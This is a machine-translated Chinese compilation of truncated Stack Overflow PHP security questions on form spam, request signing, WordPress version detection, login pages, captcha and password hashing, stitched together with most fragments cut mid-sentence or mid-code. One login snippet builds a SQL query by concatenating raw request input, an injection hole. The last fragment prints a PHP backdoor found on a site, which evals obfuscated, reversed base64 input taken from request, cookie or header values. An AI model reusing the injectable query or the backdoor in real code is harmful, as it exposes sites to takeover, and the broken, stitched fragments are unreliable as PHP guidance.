我的网站上有一个PHP联系表单邮件程序。内容不存储在数据库中，而是直接通过电子邮件发送给我。在过去的几天里，我收到了几个奇怪的联系人。用户必须填写姓名、电子邮件、确认电子邮件主题和消息。我有一个javascript安全机制，可以验证电子邮件是否输入了两次，并检查@和点。此外，必填字段使用javascript检查。这是最新消息-您可以看到它是一堆虚假链接等。从安全的角度来看，这是我应该关注的事情吗？Name:fvjnqazcyEmail:cervau@fbcalj.comEmailconfirm:cervau@fbcalj.comPhone:47668113220Subject:uSMv

我正在为用PHP编写的软件编写OSX客户端。该软件使用简单的RPC接口(interface)来接收和执行命令。RPC客户端必须对他发送的命令进行签名，以确保没有MITM可以修改任何命令。但是，由于服务器不接受我从OSX客户端发送的签名，我开始调查并发现PHP的openssl_sign函数为给定的私钥/数据组合生成了与Objective-CSSCrypto框架不同的签名(这只是openssl库的包装器):SSCrypto*crypto=[[SSCryptoalloc]initWithPrivateKey:self.localPrivKey];NSData*shaed=[selfsha1:

我一直在四处寻找这个解决方案，这是我的问题:我有一个文件调用函数.PHP，会接收POST数据，根据数据执行PHP，例子:if($_POST["data"]=="delete")//Dosomethingtodeletesomethingif($_POST["data"]=="reset")//Dosomethinghere所以基本上我可以从同一个域使用Ajax来使文件根据我的数据运行。这里ajax绝对不能跨域。我的问题出在PHP中，我发现了一个可以将数据发布到我的PHP站点的函数调用cURL()，我在Google上寻找了很多方法，但我找不到任何解决方案来防止人们对我的站点进行cURL.

我想知道是否有办法在无法访问博客管理的情况下了解后台运行的WP版本。 最佳答案 右键单击页面并转到ViewPageSource并检查此元标记内容值定义了您的wordpress版本 关于php-找出博客正在使用的WordPress版本(从外部)，我们在StackOverflow上找到一个类似的问题： https://stackoverflow.com/questions/6061272/

这里是php新手。下面是我用来构建登录系统以输入mypage.php的代码它工作得很好，但它很天真，任何人都可以在url中键入mypage.php并避免登录页面。我怎样才能使它更安全？非常感谢!if(isset($_POST['submit'])){$user=$_REQUEST['user'];$pass=$_REQUEST['pass'];$sql="SELECT*FROMloginWHEREuser='".$user."'";$res=$this->new_db->select($sql);$row=$this->new_db->get_row($res);if(isset($r

某些应用程序使用此代码作为第一行在index.php包含的每个页面:if(!defined('SECURE_CONST')){die("Accessdenied!");}他们为什么需要使用这个？安全有必要吗？如果是，我该如何正确使用它？ 最佳答案 这样做是为了确保不直接执行文件。例如:/index.php/include_me.php然后，如果请求http://example.com/index.phpSECURE_CONST将被定义，因此die()将当包含include_me.php时不会被调用。但是，如果直接请求http://e

我正在开发一个基于Symfony2PHP框架的网络应用程序。它有一个注册用户的登录页面。我想为每个登录系统的用户执行一些自定义逻辑。基本上，我想在任何用户登录系统时记录，但我不想在主页的Controller上执行此操作，因为每次用户重新加载主页时它都会记录。我还想实现一个在用户登录系统时调用的函数，这样我就可以决定是否授予任何用户访问权限(基于存储在用户数据库中的全套信息)。我怎样才能做到这一点？ 最佳答案 对于您问题的第一部分，我有类似的东西(例如，存储用户登录的最后日期和时间)。我沿着事件触发的服务路线走下去。在您的服务配置中(

我一直在收集有关如何在日志页面上防止暴力攻击或防止创建多个帐户的骚扰的信息。我得出的结论(感谢Stackoverflow的你们)最好的方法是使用验证码。但难以阅读的验证码或带重音符号的字符可能会阻止用户使用网站。因此，我找到了一个适合我的网站的易于使用的小脚本。这是一个简单的数学验证码，建议对从0到10的2个数字求和。它显示单词'one''two''three'...而不是数字。我的问题是:1)这个小验证码本身是否提供足够的安全性？2)我集成它的方式安全吗？(有什么方法可以绕过它吗？)为了避免粘贴800行代码，我做了一个总结，希望大家清楚。验证码脚本:$n1=mt_rand(0,10)

由于PHP5.5.0现已发布，哪个更好用(安全性、可移植性、面向future)？它说password_hash()PASSWORD_DEFAULT可能会在每个完整版本(+1.0或+0.1)中更改，那么我们如何使用以前的DEFAULT方法哈希密码和新默认值？这是否意味着在用户更改密码之前，数据库中已使用散列密码的PHP5.5脚本将无法在PHP5.6上运行？COST更改如何(我想知道服务器是否可以更新到phpv5.6，或者网站管理员可能会更改托管服务提供商(然后更改较弱/较强服务器的COST)，对当前用户没有任何问题)我们应该等待一些更新，还是它们已经可以在5.5.0中安全使用我们是否仍应

我找到了thiscode在客户站点的根目录上。我解密它的意思如下:$brownies=create_function('',eval(array_pop(func_get_args())););$brownies('L','9','$','>','','K','H','B','m',$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["geccmscu"])?$i["geccmscu"]:(isset($i["HTTP_GECCMSCU"])?$i["HTTP_GECCMSCU"]:die);eval(strrev(base6